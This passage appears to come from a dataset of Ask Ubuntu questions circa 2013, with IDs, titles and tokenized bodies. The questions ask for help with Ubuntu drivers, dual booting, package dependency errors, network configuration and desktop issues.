bumblebee upgrade where it will break again and i have to redo the installation . this is far from optimal as i have to do this approximately every 2 weeks : ( . some info : ubuntu 13.04 ; kernel version 3.8.0-22-generic clevo w150hr , i7 2630qm , nv gt555m , 8gb ram , ssd+hdd anybody any ideas on how to fix this ? edit : it turns out to be an issue with an outdated version of gcc .
301889	13.04 runs poorly on asus x201e-dh01	i just installed 13.04 on my asus x201e-dh01 and it runs terribly . super slow and no mouse . could somebody help ? i used to have 12.10 on it and it worked fine . i think 13.04 should be able to run because when i run it off of the usb , it works like a charm .
301893	create partitions	i am new in ubuntu and do n't know much ... i just want to ask question about how to create partitions in ubuntu . i wan na create seperate partition for software and another drive for games and one for mine but i do n't know which mount point i should select /var , / , /boot , /usr , /opt , /srv etc and i also dont know what should i select for use as there are diffrent things in use as option such as ext4 journaling file system and swap area and etc so plz help me if you can ... ... ... ... ... .
301897	configure nvidia gt440 in ubuntu 13.04	i would like to know how to get a better configuration for my nvidia graphics card because actually i 'm playing league of legends in linux , and i get about 20fps less than if i was running it in windows . can anyone help me with this issue ?
301907	why does motd and `` landscape-sysinfo '' show different disk usage to `` df '' ?	i have several drives on my server mounted separately . they are getting close to full . when i ssh to my server , motd reports disk usage , for example : = > /home is using 89.3 % of 916.89gb but if i run df -h , it reports : /dev/sdd1 917g 826g 45g 95 % /home this happens for all my drives ; motd consistently reports lower numbers . it looks likes motd runs landscape-sysinfo to report this information . why are they different and which is correct ?
301914	~/.pam_environment does n't work since ubuntu 13.04	i have this line in my ~/.pam_environment : path default= $ { home } /bin : $ { home } /.local/bin : $ { path } and it worked perfectly well on ubuntu 12.10 but since i 've updated to 13.04 it is completely ignored : $ echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games any ideas why ?
301919	run bumblebee with nouveau driver only ?	tl ; dr has anyone managed to enable dvi output with the `` switchable graphics '' setting in the bios on a thinkpad t430 ? i am trying to get to work switchable graphics with bumblebee , in order to enable the dvi output of my docking station . so far i have managed installing bumblebee following the ubuntu instructions , section `` advanced setups '' . i havent't installed the proprietary nvidia drivers nor the bumblebee-nvidia package . i can turn the discrete graphics adapter on and off : echo on > /prop/acpi/bbswitch echo off > /prop/acpi/bbswitch i have tried to fix a different bug by adding busid `` pci:01:00:0 '' to the display section of /etc/bumblebee/xorg.conf.nouveau . now , when trying optirun -vvv glxgears i 'm getting the following output : [ 1470.318076 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 1470.318859 ] [ debug ] optirun version 3.2.1 starting ... [ 1470.318875 ] [ debug ] active configuration : [ 1470.318879 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 1470.318882 ] [ debug ] x display : :8 [ 1470.318885 ] [ debug ] ld_library_path : [ 1470.318889 ] [ debug ] socket path : /var/run/bumblebee.socket [ 1470.318892 ] [ debug ] accel/display bridge : auto [ 1470.318895 ] [ debug ] vgl compression : proxy [ 1470.318898 ] [ debug ] vglrun extra options : [ 1470.318902 ] [ debug ] primus ld path : /usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus [ 1470.318965 ] [ debug ] using auto-detected bridge virtualgl [ 1470.443846 ] [ info ] response : no - error : [ xorg ] ( ee ) nouveau ( 0 ) : [ drm ] failed to set drm interface version . [ 1470.443873 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nouveau ( 0 ) : [ drm ] failed to set drm interface version . [ 1470.443878 ] [ debug ] socket closed . [ 1470.443903 ] [ error ] aborting because fallback start is disabled . [ 1470.443908 ] [ debug ] killing all remaining processes . there is a troubleshooting section for this drm error on the wiki . it mainly focuses on getting things to work with the proprietary nvidia driver , and otherwise reads : if you want to use the nouveau driver , check the syslog for more log entries . i have n't found anything suspicious , short of the following : [ 891.570346 ] [ drm ] can not find any crtc or sizes - going 1024x768 [ 891.640967 ] nouveau [ drm ] allocated 1024x768 fb : 0x60000 , bo ffff8801dd0f6c00 searching for this particular error message was n't helpful so far . ( i have also posted the entire output of dmesg . i have n't tried installing the nvidia drivers , and currently i 'm reluctant to do so , because i do n't want to recompile/reinstall the driver after every kernel update , and i 'd like to stay open source as much as possible . is it possible to enable switchable graphics ( at least for dvi output ) with the nouveau driver ? ubuntu 13.04 , thinkpad t430 .
301923	installation of a second java sdk	i have java sdk 1.7 installed correctly . it turns out i need the version of 1.6 also ( an application needs it ) . how do i install the version of 1.6 and how do i make sure that we 'll both work correctly eventually ?
301929	is intel turbo-boost option good for life-time ?	here is intel-core-i-7 with 2.8 ghz resp . 3.5 ghz as turbo-boost option . with this question i refer to this link : does intel turbo boost work in ubuntu ? is option of turbo-boost not harming the hardware regarding the life-time of the processor resp . of the hard-ware ? i know by benchmarking of hard-disks - like defragmenting under windows - that such benchmarking can shorten the life-time of hardware up to 3 times ... ( my harddisk of the first pc in 2000 under windows - was broken by win98se after only 2 years ) . when should i use turbo-boost resp . when should i avoid it ?
301930	downgrade a bunch of packages	maybe you have installed packages from a ppa or an external source ( e.g . downloaded a .deb for a package that is available through the ubuntu repos. ) . then you decide to drop these upgraded versions in favour to the official repositories.first step is to remove the entries of the sources.list . is there a way to downgrade all to the highest available version ? i know you can install specific versions with apt-get install [ package ] = [ version ] but can you downgrade all ?
301934	vim is not working fine in ubuntu 13.04	how to install full version of vim editor in ubuntu 13.04
301936	new instalation of ubuntu 13.4	hi guys i installed new ubuntu yesterday today when i switched on my pc i got this message error mounting /dev/sda2 at /media/mperequest/26e00037e000102b : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/mperequest/26e00037e000102b '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . please assist
301943	i want to install windows 7 64 bit alongside ubuntu , but the windows installer wo n't install in the ntfs partition	good day , i installed ubuntu 12.04 64 bit on the entire partition on a laptop without an os ( lenovo g480 i5-3230 ) . then , i decided to create an ntfs partition to install windows 7 64 bit ( using a bootable usb ) on it . however , when i want to boot with uefi turned on in the bios , all i can boot is my ubuntu . when i turn off the uefi mode in the bios , i can boot from the usb but windows 7 wo n't install on the ntfs partition . how do i install windows 7 alongside ubuntu and make them both work ? gparted info : /dev/sda1 fat32 /boot/efi 94.00 mib 885.00kib 93.14 mib boot /dev/sda2 ext4 / 361.10 gib 37.89 gib 323.21 gib /dev/sda4 ntfs 100.67 gib 3.00 gib 97.66 gib /dev/sda3 linux-swap 3.90 gib -- - -- - unallocated 1.02 mib -- - -- -
301950	why wo n't youtube videos play but all other websites work fine ?	i 've tried everything i can think of , asking in a forum in spanish , uninstalling flash , looking for 64 bit versions , sorry but my mind just does not have another idea here and i 'm absolutely and totally frustrated . problem is that if i go to youtube.com and click on a video to watch , it wo n't play . the player will load , meaning that i can see the black square with the play button and everything , but , a few seconds later , it just says `` there has been an error , try again later '' and every single time i try , the exact same problem occurs . to make things even odder , if i go to whatever video website it 'll work just fine , so you name it ( vimeo , metacafe , etc . ) they all work except youtube . as i said i am extremely frustrated because i 've tried everything i can think of , and nothing has had good results here .
301953	how i can i unsource my environment ?	i have source my environment and some environment variables were set , but i need to shift back to my previous environment , how should i do it ? is there any way to move to the last environment ?
301954	gnome in ubuntu server	i have installed gui in ubuntu server using sudo apt-get ubuntu-desktop -- no installrecommends i have started it using startx i have accessed the home folder using ( since there is no icons ) nautilus is there any other way to open the home folder ? if i restart my server will it automatically go to the gui or the to the login prompt at the command line ?
301958	why asus q500a fails to dual boot ?	i have followed several links including ubuntu 's guide to uefi installation and several guides on askubuntu but i have a unique problem : https : //help.ubuntu.com/community/uefi installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) http : //ubuntuforums.org/showthread.php ? t=2133526 & page=1 http : //apcmag.com/how-to-dual-boot-windows-8-and-linux.htm http : //www.linuxbsdos.com/2012/11/05/dual-boot-windows-8-and-ubuntu-12-10-on-uefi-hardware/ after installation live usb restarts rather than booting into ubuntu , unlike most problems , windows is functional ( but lets get beyond w8 ) there are two guides , one that encourages csm to be enabled and disabled ( askubuntu and ubuntu forums ) when it is disabled the launcher shows , but then just a blank screen appears . `` blank screen '' solutions to use nomodeset ( via initial boot command ) this asus q500a is missing efi/boot/bootx64.efi when i try to launch efi shell in the `` bios '' it fails . any thoughts on why would this asus model fail all the manuals ?
301959	why does my download have a `` heartbeat '' ?	i sometimes download large files , and when i do i always see this kind of `` heartbeat '' in the speed of the download : although it does n't really matter to me , i just wonder what causes this behaviour ? is it ubuntu itself , or my router , or my isp or maybe something else ? [ edit ] just to clarify ; this happens with any download , whether it be through http , ftp , or even when i 'm using torrents..
301968	ubuntu 13.04 extremely slow	i have installed ubuntu 13.04 on my desktop ( intel 1.6 ghz dual core processor , 512mb ram ) it 's a dual boot with xp . its booting time is okay but it is extremely slow while doing normal tasks ( like opening firefox or terminal or any other thing ) . its 3d effects are also hanging . can anyone please suggest what should i do to increase its speed .
301969	apps icons unlock from launcher after restart	i have downloaded idle python ide from software center and locked it to launcher . but the icon is just a question mark in a grey square and whenever i lock it to launcher after restarting the machine it disappears from launcher and i have to lock it again . i dragged it from the dash to launcher but no lock . i 'm using ubuntu 13.04 raring .
301973	propertiary driver ati mobility radeon hd2600	i have got ati mobility radeon , open source driver and gallium 0.4 on rv 630 . this open source driver is not powerful . i downloaded driver from amd web page and at the beginning of the installation i received this : check if system has the tools required for installation . fglrx installation requires that the system have kernel headers . /lib/modules/3.8.0-19-generic/build/include/linux/version.h can not be found on this system . one or more tools required for installation can not be found on the system . install the required tools before installing the fglrx driver . optionally , run the installer with -- force option to install without the tools . forcing install will disable amd hardware acceleration and may make your system unstable . not recommended .
301974	installed then removed kubuntu desktop - now ubuntu/unity does n't look quite right	i am running qq - default ubuntu/unity desktop installed kubuntu-desktop with 'apt-get install kubuntu-desktop ' to try it out . decided i did n't like it , so i removed it with 'apt-get remove kubuntu-desktop ' . when kubuntu-desktop installed , apt-get told me it would take over 400mb of disk space . but when i removed it , it only removed about 50mb worth of packages . obviously , everything was not removed . i ran deborphan which listed a long list of packages that were no longer in use , all related to kubuntu ( apparently ) . i started removing the packages listed in deporphan one by one with apt-get . apt-get told me there were a lot of unused packages and i could run 'apt-get autoremove ' . so i ran 'apt-get autoremove ' which deleted a great deal of stuff - about 400 mb - apparently the packages and apps that were not removed when i just ran 'apt-get remove kubuntu-desktop ' . but now , when i run the default ubuntu/unity desktop , things look different : fonts are bigger on all the menus , tabs and windows and backgrounds look very square and old-fashioned and on some apps the theme and color settings do n't seem to be working right . looks like when i ran 'apt-get autoremove ' it removed parts of the gnome gui framework that default ubuntu/unity uses . ( or maybe some parts of kubuntu/kde are still in there and the gui is defaulting to use them ... ? ) how can i fix this ? what packages do i need to re-install or remove ? edit : what i noticed now in particular is that the the widget frames and some of the colors look like kubuntu . for example , the window frames are dark grey and square and do n't show shadowing and highlighting the way unity does . and in firefox , when i added a new folder to the bookmark toolbar , the folder showed up with a dolphin style folder icon , not what you seen normally - not similar to the icon ins nautulis ( why do look ok ) . looks it 's running partially kubunta kde widgets and partially gnome/unity widgets .
301975	windows skips grub after cmd	i used the command bootrec.exe /fixmbr thinking i could get the windows boot manager instead of grub now it just skips ubuntu plz help
301977	installing pygame ubuntu 13.04	i recently installed ubuntu 13.04 and want to install pygame . i 've attempted doing as instructed on the pygame page ( using the source code ) however i am unable to install the dependencies and i get unable to locate package for every single one . i then tried , as suggested throughout other forums , `` sudo apt-get install python-pygame '' however these were quite old forum posts , talking about ubuntu 9.x . this did not work , and i got the error : unable to locate package pygame . can someone please help me with this ?
301978	how to install remastersys	i had ubuntu 11.04 lts running and had installed remastersys . now that i have upgraded my system to ubuntu 12.04 64 bit , was trying to install remastersys again . the website says development of remastersys has been stopped and there is no hint as how to install it . somebody please help me install remastersys ? also , is there any way that i can create the copy of my installation of ubuntu with all its applications.. ?
301981	'e : the package libmagickcore4-extra needs to be reinstalled , but i ca n't find an archive for it . '	i was going to upgrade from 12.04 to 12.10 and skipped the update for libmagickcore4-extra , and some problem occurred , and the upgrade stopped . now , whenever i try and open the software update , i get this message : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : the package libmagickcore4-extra needs to be reinstalled , but i ca n't find an archive for it' i tried finding a solution on how do i resolve unmet dependencies ? but with no luck . the terminal gives the same error message . please help ! !
301982	blocking mac address does not work on dhcpv6 request	i blocked a mac address of a client on my dhcp server running on ubuntu 12.10 using iptables -a input -m mac -- mac-source -j drop but i am still getting dhcp requests from the client and the client is getting the ip address from my dhcp server too . i think the command does not work for broadcast messages . is there any other technique to do it ? i do not have access to the dhcp server code .
301984	if i files with differences in contents on diffent pcs , how does ubuntu-one keep them in sync ?	suppose i have 2 versions of a file in two computers connected to ubuntu-one . what happens ? does one file get overwritten with the contents of another ? what if i 'm currently editing the file ?
301988	using movemail with thunderbird on ubuntu	i 'm trying to read local mail with thunderbird on ubuntu ( with both 12.04 and 13.04 ) . i 've followed the instructions found here : how can i access system mail in /var/mail/ via thunderbird ? i can read mail on the system using alpine or vim , so i know the mailbox is not empty . when i click the get-mail button , nothing happens . i see no inbox ( or any folder structure ) for the specific account . i 've set the rights for /var/mail to 1777 . settings server name : localhost username : john how can i get this working ? okay , considering the extra bounty , i would like to get this working like normal mail . the accepted answer from qasim resulted in a much more usable situation than before - opening mail in thunderbird with layout . i still face three problems though . when new mail is received in the mailbox , thunderbird wo n't see this until after i restart thunderbird . when thunderbird is restarted , all mail is reset to unread and deleted mail is undone . this is probably because thunderbird reads the mail from the /var/mail/www-data file , but does n't update this file . so after restarting , it simply reads this file again , with the new mail and all old mail . this is probably a postfix issue : mail is sent out to existing mail addresses , but can not be delivered because the receiving mailserver can not be reached . this results in `` undelivered mail returned to sender '' . only one mailserver can be reached : localhost . because this is a test system , i do n't want real customers to receive mail . i 've blocked mail ports in ufw to be sure . when opening the returned mail , i can scroll down and then i see the original mail with proper layout . so i can read the mail , see if the proper images are included , and for me that 's workable . having to restart tb to read new mail - i know when new mail arrives , so i know when to restart . having old mail restored after a restart - not big problem as well . i can delete the mail file if it gets too much . i know how it works , but it would be nice if it worked like normal .
301995	converting rpm file to debian fle	please any one give the solution for this whenever i try to convert the rpm file to deb file i always get this problem error : /home/sumantakar/documents/testrpm.rpm : not an rpm package ( or package manifest ) error executing `` lang=c rpm -qp -- queryformat % { name } '/home/sumantakar/documents/testrpm.rpm ' '' : at /usr/share/perl5/alien/package.pm line 489 thanks
301999	ubuntu12.04 has libc6 dependency problems when installing software	the following packages unmet dependencies : libc6 : depends : libc-bin ( = 2.15-0ubuntu10.3 ) but 2.15-0ubuntu10.4 already installed libc6-dev : depends : libc6 ( = 2.15-0ubuntu10.4 ) but 2.15-0ubuntu10.3 already installed depends : libc-dev-bin ( = 2.15-0ubuntu10.4 ) but 2.15-0ubuntu10.4 already installed libc6 : i386 : depends : libc-bin ( = 2.15-0ubuntu10.3 ) but 2.15-0ubuntu10.4 already installed what is the reason , how to solve ?
302000	how to install apache , mysql , php as non root without using apt-get ?	i am using ubuntu 13.04 version.i am newbie for ubuntu.can i able to install lamp as non-root and without using sudo apt-get ?
302001	install ubuntu 13.04 ( 64bit ) along with windows 8 ( 64bit ) on an unpartitioned hard disk	i have a laptop with 500gb hard disk space , running windows 8 ( 64 bit ) on an unpartitioned hard disk . that is , windows 8 is installed on the c drive ( c : / ) and it occupies all the 500gb of hard disk space . can you please guide me in installing ubuntu 13.04 ( 64 bit ) without affecting the current windows 8 os or the personal files associated with that os , so that the laptop can be dual-boot . thanks in advance .
302002	viewing videos with moonlight	i 'm interested in viewing certain silverlight videos . i tried the moonlight plugin but the videos are not visible and i can not install the media codec pack when offered to do so . i gives an error `` can not fetch eula '' . does anybody know how to install the media codec pack ?
302011	configuring ubuntu vmware guest nat	i have a windows host that runs guest ubuntu vm via vmplayer . that virtual machine will be cloned , distributed among several people ( running windows hosts ) and used for conducting a programming workshop . i am trying - and so far failing - to setup networking to satisfy the following requirements : the guest has to have access to the internet all the clones should have the same hostname ( let 's say workshop to be concrete ) the host system must be able to access its respective guest via that name ( e.g . ping workshop would ping the guest that is running on that host and not any other clone ) what i 've tried so far : '' installed '' a nat network adapter for the guest tried to connect the guest via dhcp , in /etc/network/interfaces : auto eth0 iface eth0 inet dhcp hostname workshop that works as far as connecting to the internet is concerned . however , i am unable to connect to the guest from the host at all . ( e.g . ping workshop does not work ; if i use the address returned by ifconfig it does not work either from the host ) . i then tried assigning a static address to the guest : auto eth0 iface eth0 inet static address 172.241.0.101 netmask 255.255.0.0 gateway 172.241.0.100 ( 172.241.0.100 is the address assigned statically to the host by vmware network vmnet8 adapter - that 's the nat adapter above ) . now , i can ping 172.241.0.101 and telnet to it from the host . i can also ping and telnet from the guest to 172.241.0.100 ( the host ) , but that 's about it - there is no connection to the wider network . ( i also ca n't access the guest via its hostname , but that 's not crucial here since if push comes to shove i can use its address directly - as long as it is the same for everybody - and not the name ) . now , i think i can use the bridged network connection option with dhcp and that will give me what i need in case of one vm ( i did not try it in this case , but i remember doing it previously ) . however , in case of several vm 's with the same hostname and their hosts connected to the same network that will be problematic , wo n't it ? your solutions and other advice will be much appreciated .
302012	how do i use kate 's text filter plugin for macros ?	i 've been through just about every editor on linux ( gedit , geany , vim , gvim ) , and decided that kate works best for me . however , it does n't easily support macros , and i need to do a search and replace . so i am trying to use kate 's text filter plugin , and sed . i want to remove double quotes from a sql statement that i pasted from a java module , so that i can run it . i tried entering this in the text filter with the entire block of text selected , but it just told me /bin/sed : no input files . i know i can do a search and replace , but i may want to expand this to do other things to the file . does someone know how to use this plugin ?
302018	precise boots up with 60 % brightness and says it 's 100 %	sometimes when i boot my acer aspire one d257 , the brightness goes to around 60 % . that would n't be an issue because i could of just execute `` xbacklight -set 100 '' at start-up , but that 's not the problem . the problem is that ubuntu thinks that my brightness is already at 100 % and does not allow me to higher it anymore while i can clearly spot the difference of 60 % to 100 % . usually to fix this , i just restart my computer once or a couple of times , but it highly pisses me off . i would like to find a solution , and any help will be valued !
302019	can i restore content of /var/spool for package defaults ?	i 'm a class a muppet . i have had /var/spool/ mounted as tmpfs for over a year and that means crontab has never been able to remember what it 's doing and postfix has been broken . i 'm not asking to restore lost data . that data is long gone . i would like to restore the default content of /var/spool/ though . crontab seems to manage to write its own but to get postfix back online i have to reconfigure ( or reinstall ) it . these are just two systems that i know of . there could be dozens more . is there any way to tick through all the installed packages and work out which should have something in /var/spool/ ? and by extension , is there any simple way to restore that data ?
302023	ubuntu 13.04 multi monitor dell precision m4600 nvidia optimus	i 've been fighting for two days now trying to get mulitmonitor support for the my dell precision m6400 with a nvidia quadro 1000m . i recently saw that nvidia 's 319 drivers supported optimus , so naively i went in bright eyed and bushy tailed down the rabbit hole ... i am currently in a docking station using 2 external monitors ( over dvi ) connected to the dock and i 'd like to use the laptop screen as my 3rd monitor . i 've tried using bumblebee and not , i 've tried using the xorg.config i found on nvidia 's website , i 've tried using the ubuntu software center 's additional drivers section . my machine is in such a bad state , i 'm not sure where to go from here . there was a time when i was able to get just get the two external monitors with a blank laptop screen and even getting back to that would be a huge . any advice would be really appreciated . please let me knwo what further information is required to help solve this problem . thanks
302028	stall during ubuntu 13.04 installation	hi , i use virtual machine to install ubuntu 13.04 by iso file , when it comes to `` retrieving file 40 of 102 '' , it stall for a long time for at least 1 hour , whats the problem ... ?
302030	how to change permission of user using gui	been using linux/ubuntu for a while , and been always annoyed as to why i can not create folders , overwrite files and stuff using gui ( desktop ) . but i can however , manipulate the files using sudo cli . ive been always interacting with the files through gui , how can i change this ?
302042	ubuntu server on power 6 ibm p520	can ubuntu server run on an ibm p520 power6 ?
302045	wakeup ubuntu 13.04 with usb keyboard	i am trying to wakeup my laptop using a wireless keyboard . therefor i need to enable usb wakeup . can anybode make a very easy-to-follow guide .
302050	nat not working in a container	following instructions i 've installed docker on ubuntu 13.04 ( and 12.04 + 3.8 kernel ) , pulled the base container and started a shell inside it . it got a private ip and can ping it 's default gateway but ca n't connect to any host outside , so no apt-get for me . i have `` net.ipv4.conf.all.forwarding = 1 '' in my sysctl and have postrouting rules in iptables/nat table . did the docker installer forgot to add some rules or i 'm missing something ?
302052	the installation or removal of a software package failed	i recently updated to ubuntu 13.04 , after installing some random program from the software-center i get the `` package operation failed '' - `` the installation or removal of a software package failed . '' and it looks like it has to do with python 3.3 . can someone explain what is this all about . ( note that the random program was installed ) full paste installarchives ( ) failed : selecting previously unselected package zenmap . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % -- -- -- -- -- unpacking zenmap ( from ... /zenmap_6.00-0.3_i386.deb ) ... processing triggers for man-db ... processing triggers for desktop-file-utils ... setting up python3.3-minimal ( 3.3.1-1ubuntu5 ) ... traceback ( most recent call last ) : file `` /usr/lib/python3.3/py_compile.py '' , line 8 , in < module > import imp file `` /usr/lib/python3.3/imp.py '' , line 28 , in < module > import tokenize file `` /usr/lib/python3.3/tokenize.py '' , line 28 , in < module > import re file `` /usr/lib/python3.3/re.py '' , line 122 , in < module > import sre_compile file `` /usr/lib/python3.3/sre_compile.py '' , line 14 , in < module > import sre_parse file `` /usr/lib/python3.3/sre_parse.py '' , line 17 , in < module > from sre_constants import * file `` /usr/lib/python3.3/sre_constants.py '' , line 18 , in < module > from _sre import maxrepeat importerror : can not import name maxrepeat dpkg : error processing python3.3-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python3-minimal : python3-minimal depends on python3.3-minimal ( > = 3.3.1-1~ ) ; however : package python3.3-minimal is not configured yet . dpkg : error processing python3-minimal ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3.3 : python3.3 depends on python3.3-minimal ( = 3.3.1-1ubuntu5 ) ; however : package python3.3-minimal is not configured yet . dpkg : error processing python3.3 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3 : python3 depends on python3.3 ( > = 3.3.1-1~ ) ; however : package python3.3 is not configured yet . python3 depends on python3-minimal ( = 3.3.1-0ubuntu1 ) ; however : package python3-minimal is not configured yet . -- -- -- -- -- errors were encountered while processing : python3.3-minimal python3-minimal python3.3 python3 python3-apt python3-dbus language-selector-common python3-gi bluez gnome-menus kde-runtime kdenlive gnome-bluetooth indicator-bluetooth gnome-control-center python3-xkit ubuntu-drivers-common python3-pkg-resources python3-crypto python3-oauthlib friends-dispatcher libfriends0 lsb-release ubuntu-minimal python3-gdbm : i386 python3-commandnotfound command-not-found python3-distupgrade python3-update-manager ubuntu-release-upgrader-core ubuntu-standard ufw update-manager-core python3-problem-report python3-apport apport apport-gtk apturl-common unattended-upgrades python3-software-properties software-properties-common python3-aptdaemon python3-aptdaemon.gtk3widgets software-properties-gtk apturl setting up zenmap ( 6.00-0.3 ) ... setting up python3.3-minimal ( 3.3.1-1ubuntu5 ) ... traceback ( most recent call last ) :
302055	how to install openjdk-7-jdk on ubuntu 12.04 without dragging in unrelated gui and sound packages ?	ubuntu 12.04.2 lts what 's going on here ? # apt-get install openjdk-7-jdk reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : consolekit cryptsetup-bin dbus-x11 dconf-gsettings-backend dconf-service gconf-service gconf-service-backend gconf2 gconf2-common gvfs gvfs-common gvfs-daemons gvfs-libs libatasmart4 libavahi-glib1 libbonobo2-0 libbonobo2-common libcairo-gobject2 libcanberra0 libck-connector0 libcryptsetup4 libdconf0 libfontenc1 libgconf-2-4 libgconf2-4 libgdu0 libgl1-mesa-dri libgl1-mesa-glx libglapi-mesa libgnome-keyring-common libgnome-keyring0 libgnome2-0 libgnome2-bin libgnome2-common libgnomevfs2-0 libgnomevfs2-common libgtk-3-0 libgtk-3-bin libgtk-3-common libgudev-1.0-0 libidl-common libidl0 libllvm3.0 libltdl7 liblvm2app2.2 liborbit2 libpam-ck-connector libpolkit-agent-1-0 libpolkit-backend-1-0 libsgutils2-2 libtdb1 libvorbisfile3 libx11-xcb1 libxaw7 libxcb-glx0 libxcb-shape0 libxmu6 libxpm4 libxv1 libxxf86dga1 libxxf86vm1 mtools openjdk-7-jre policykit-1 policykit-1-gnome sound-theme-freedesktop udisks x11-utils is it possible to install the jdk without half of gnome and x11 ? and sound themes ? this is a headless ( and speakerless ) server .
302060	ubuntu doesnt boot if selected in bootup option . installed alongside windows 8	i have installed ubuntu 12.04 alongside windows 8 using live cd.installation was successful . on restart , it used to boot with windows without providing choose option . now , after creating a new entry using easybcd2.2 , it provided me option of both windows 8 and ubuntu.selecting windows 8 works normally.but on selecting ubuntu , it doesnt boot up and says file : \nst\autoneogrub0.mbr status : 0xc000007b not able to figure out .
302073	how do i connect to usb hdd on bt homehub 3 ?	i have a home network , based around a bt homehub 3 . my understanding is that whilst the bt homehub 3 is essentially a linux machine , it uses windows ( smb ) networking . i also have an htpc based on openelec on the network , and a sony vaio on which i use ubuntu ( dual boot with windows 7 ) . attached to the bt homehub 3 ( via usb ) is a 2tb ntfs media storage drive . the htpc can see and connect to this just fine , at smb : //bthub3/usb1 , and can stream media from it , as intended . however i wish to also connect my ubuntu laptop and the homehub mounted drive . this is proving to be a real pain . i have tried the following : in browser ( chromium ) navigate to file : //192.168.1.254/ ( the is the correct ip for the bthomehub , but i get the file list for my laptop ! ? ? in nautilus - click through home group - freezes and fails to access `` unable to access location '' . in terminal : nautilus smb : //bthub3/usb1 - nothing happens . note that the default workgroup for ubuntu is workgroup , but i changes this to home . i have tried all the above using both variations . please help me . cheers ,
302077	how to enable paste in terminal with ( middle ) mouse button	after an apt-get update & & apt-get upgrade my middle mouse button paste stopped working on the xserver/12.04.2 lts . it might have been due to a apt-get autoremove as well , which i ran just afterwards , but i do n't recall the specific point when it stopped working . basically copy-paste is gone which i 've never seen before on any xserver i 've used ... quite a handicap . i 've re-installed xsel . if i mark text in xterm and call xsel -p i do see the marked text , so apparently selections are being copied into the primary selection buffer , only the paste key functionaltiy is gone . any idea on how to bind any mouse key to paste text from the selection buffer in applications ( esp xterm , urxvt ) ? ( it does not have to be middle mouse button in particular ) .
302079	no sound 12.04 mac mini 4,1	i have a mac mini 4,1 . i get no sound at all except when i play through the internal speaker . currently sound is supposed to go through the hdmi cable to the tv . i can see the hdmi output in the sound settings , but i get no love from the speakers . i 've double checked the connection as sound works just fine in osx . this is my first stab at using ubuntu so eli5 please .
302084	grub menu not appearing after reinstall and boot repair	i reinstalled ubuntu ( it was working right ) and now the grub menu is not appearing . i 've used the boot repair tool too , it just shows a black screen and the underline flashing . http : //paste.ubuntu.com/5717138/ thanks .
302089	disabling auto enable bluetooth	i use a 13.04 system . whenever the system boots up , the bluetooth button is by default on..every time i have to manually disable it.is there any way to disable this ?
302090	how to merge the folders : downloads - téléchargements / pictures - images / videos - vidéos ?	i had previously installed ubuntu unity 13.04 in french , and got the folders : téléchargements - images - vidéos then i reinstalled it in english and got the new folders : downloads - pictures - videos a dialog box asked me to merge them but i refused it . looks like now i changed my mind . indeed i would like to properly merge them together in order to have only french version of them and make unity works fine . please help .
302091	what process print boot text ?	what process does print the boot text ( * starting service foo [ ok ] ) . if i want to alter it , where should i look ? thanks in advance !
302095	how to get hdmi audio to tv working on 12.04	i am still struggling to even see an hdmi connector for audio on ubuntu 12.04 . video through the hdmi works fine , using the nvidia-experimental-310 driver ( s ) . i lean towards thinking that some basic audio driver or audio entry missing , since there is no hdmi related audio output to select anywhere via gui . sound plays fine through the laptop itself , it 's through the hdmi line that is the problem . the current set of answers posted speak to similar problem but do n't solve it for me , for example : does n't work how do i output audio through hdmi ? ) most answers with pavucontrol are not the answer , as there is only the `` built in audio '' showing up . things i have learned ( done this on two machines , 10.04 with hdmi , no sound , now 12.04 ) bumblebee does n't seem to help video or audio . i 've removed it . only the nvidia-experimental-310 seems to get the dual display via hdmi ( to a toshiba monitor ) working right . some threads talk about keeping the connector in before boot , this does not impact anything for me . raw control through hdmi works with sound via windows 7 my specifics : - ubuntu 12.04 - hp eliteboox 8530w , uses nvidia quaddro video card - 'lspci | grep audio ' gives null - 'lspci | grep -i hdmi ' gives null . - sounds settings , output , shows only `` analog output/ built in audio '' - 'aplay -l ' output **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : ad198x analog [ ad198x analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 suggestions welcome : - )
302096	can not format flash drive due to write protection	okay , just the other day , i was trying to install ubuntu on an 8gb flash drive . near the end of the installation process , the install failed . the flash drive is now entirely dysfunctional . at first , the flash drive would mount on windows , but not on ubuntu . in ubuntu , by disk utility , gparted , and terminal , i was not able to format the flash drive , it only returned errors . when i took it to windows , it will mount it , but i ca n't move any files because it will return an error that the flash drive is write protected . same thing happens when i try to format it , both by the formatting tool and command prompt . i tried another format tool i found online after searching elsewhere for this problem , but the program crashed , and now windows wo n't even mount the flash drive , saying that i need to format it .
302103	font messed up ?	what have i done ? ! compare that to : you 'll see that there 's a slight difference .
302105	ubuntu 13.04 and amd proprietary graphics drivers with ppa	i want the amd proprietary graphcis drivers installed via ppa . i do n't want to install it manually because of updates . the open source drivers are not good for me because unity is not smooth then . my question is can i just click this to install the proprietary amd drivers ? is it bad when switching the points there without uninstalling something or does ubuntu uninstall it automatically when switching a ppa driver ? is this driver from amd ? i clicked on it and it did everything automatically . did i have to uninstall something before or is it not bad when switching this from one point to another ? and are these drivers exactly the same as from the website ? edit : push : )
